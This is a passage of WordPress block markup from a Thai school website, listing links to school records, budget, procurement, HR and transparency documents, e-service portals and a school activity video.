href=\"https://drive.google.com/file/d/1KNY_0cfvU0tSAr568ZHSWspTl7t86-R6/view?usp=sharing\" data-type=\"page\" data-id=\"19\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_13660f-b9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_13660f-b9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=sharing\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_702c0e-e7\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_702c0e-e7\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\">ข้อมูล O-NET</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_0109ca-f6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_0109ca-f6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://eita.ssk.in.th/eit_admin.php\" data-type=\"link\" data-id=\"http://eita.ssk.in.th/eit_admin.php\">แบบวัดการรับรู้ EIT (2</a>)</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_b4c32e-bd\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_b4c32e-bd\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-200\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/EIT_QRCode-1.png\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"hasUrl\":true,\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<a class=\"gb-button gb-button-48e80028 gb-button-text\" href=\"https://www.facebook.com/profile.php?id=61556083436494&amp;sk=videos\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></a>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:video {\"id\":64,\"align\":\"center\"} -->\n<figure class=\"wp-block-video aligncenter\"><video controls poster=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/VTR-แนะนำโรงเรียน.png\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/วันครู-1.mp4\"></video></figure>\n<!-- /wp:video --></div>\n<!-- /wp:group -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":17},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"paginationMargin\":{\"md\":{\"bottom\":\"-40\",\"top\":\"-20\",\"right\":\"10\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"abc6c06d\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} /-->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"b0641f20\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:image {\"id\":260,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/O27-1024x576.jpg\" alt=\"\" class=\"wp-image-260\"/></figure>\n<!-- /wp:image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/14sI1pHQ6FFaNHMgoK3-29HJ5-OSuA8MD/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><code><a href=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\" data-type=\"link\" data-id=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\">Q&amp;A</a></code></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1ZP0lY1uWV2IQ20oOS1Vb_P11dTUVoRrK/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1ZP0lY1uWV2IQ20oOS1Vb_P11dTUVoRrK/view?usp=share_link\">แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\">แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1vuZFLIWRkwFNN4GX0n7enJwyg8eDIzBQ/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1vuZFLIWRkwFNN4GX0n7enJwyg8eDIzBQ/view?usp=share_link\">รายงานผลการดำเนินงานประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\">คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</a></strong><br> <a href=\"https://drive.google.com/file/d/1_WPqMYyMm_idddDd0MMPPRVoeY0erzfv/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1_WPqMYyMm_idddDd0MMPPRVoeY0erzfv/view?usp=share_link\">    - คู่มือฝ่ายบริหารงานงบประมาณ</a><br> <a href=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\"> - คู่มือฝ่ายบริหารงานวิชาการ</a><br> <a href=\"https://drive.google.com/file/d/1qKTCUzkpxq5KGBSV23JUe989WP112FZv/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1qKTCUzkpxq5KGBSV23JUe989WP112FZv/view?usp=share_link\">- คู่มือฝ่ายบริหารงานบุคคล</a><br> <a href=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\">  </a><a href=\"https://drive.google.com/file/d/14pibk03Y3KVvKw1bp6bOYJB0RjcxVkC2/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/14pibk03Y3KVvKw1bp6bOYJB0RjcxVkC2/view?usp=share_link\">- คู่มือฝ่ายบริหารงานทั่วไป</a></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\">คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\">ข้อมูลเชิงสถิติการให้บริการ</a></strong></td></tr><tr><td><strong><a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">E-Service</a></strong><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">สถิติการมาเรียน </a><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">ตรวจสอบผลการเรียน</a><br>      -  <a href=\"https://www.obec.go.th\" data-type=\"link\" data-id=\"https://www.obec.go.th\">OBEC</a><br>      -  <a href=\"http://contentcenter.obec.go.th\" data-type=\"link\" data-id=\"http://contentcenter.obec.go.th\">OBEC Content Center</a><br>      -  <a href=\"https://a6702.obec.expert/authen/login\" data-type=\"link\" data-id=\"https://a6702.obec.expert/authen/login\">School MIS</a><br>      -  <a href=\"https://portal.bopp-obec.info/obec67\" data-type=\"link\" data-id=\"https://portal.bopp-obec.info/obec67\">ข้อมูลนักเรียนรายบุคคล (DMC)</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\">ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1HgGDEc5Rx8qn95aySOUn58ERju9XxhA4/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1HgGDEc5Rx8qn95aySOUn58ERju9XxhA4/view?usp=share_link\">ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\">ร</a><a href=\"https://drive.google.com/file/d/1iNx6GzzU16YF1hChm0Wpd48vl4RjwLvq/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1iNx6GzzU16YF1hChm0Wpd48vl4RjwLvq/view?usp=share_link\">ายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/18y88RapyKtpYZaogaASQKJRo0_aXRsbi/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/18y88RapyKtpYZaogaASQKJRo0_aXRsbi/view?usp=share_link\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\">รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1NEYcpYMKhZ8r6tEVPscCjn9illJwN0w8/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NEYcpYMKhZ8r6tEVPscCjn9illJwN0w8/view?usp=share_link\">ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\">การขับเคลื่อนจริยธรรม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://forms.gle/KBRUecqKvRqxgrPm7\" data-type=\"link\" data-id=\"https://forms.gle/KBRUecqKvRqxgrPm7\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e 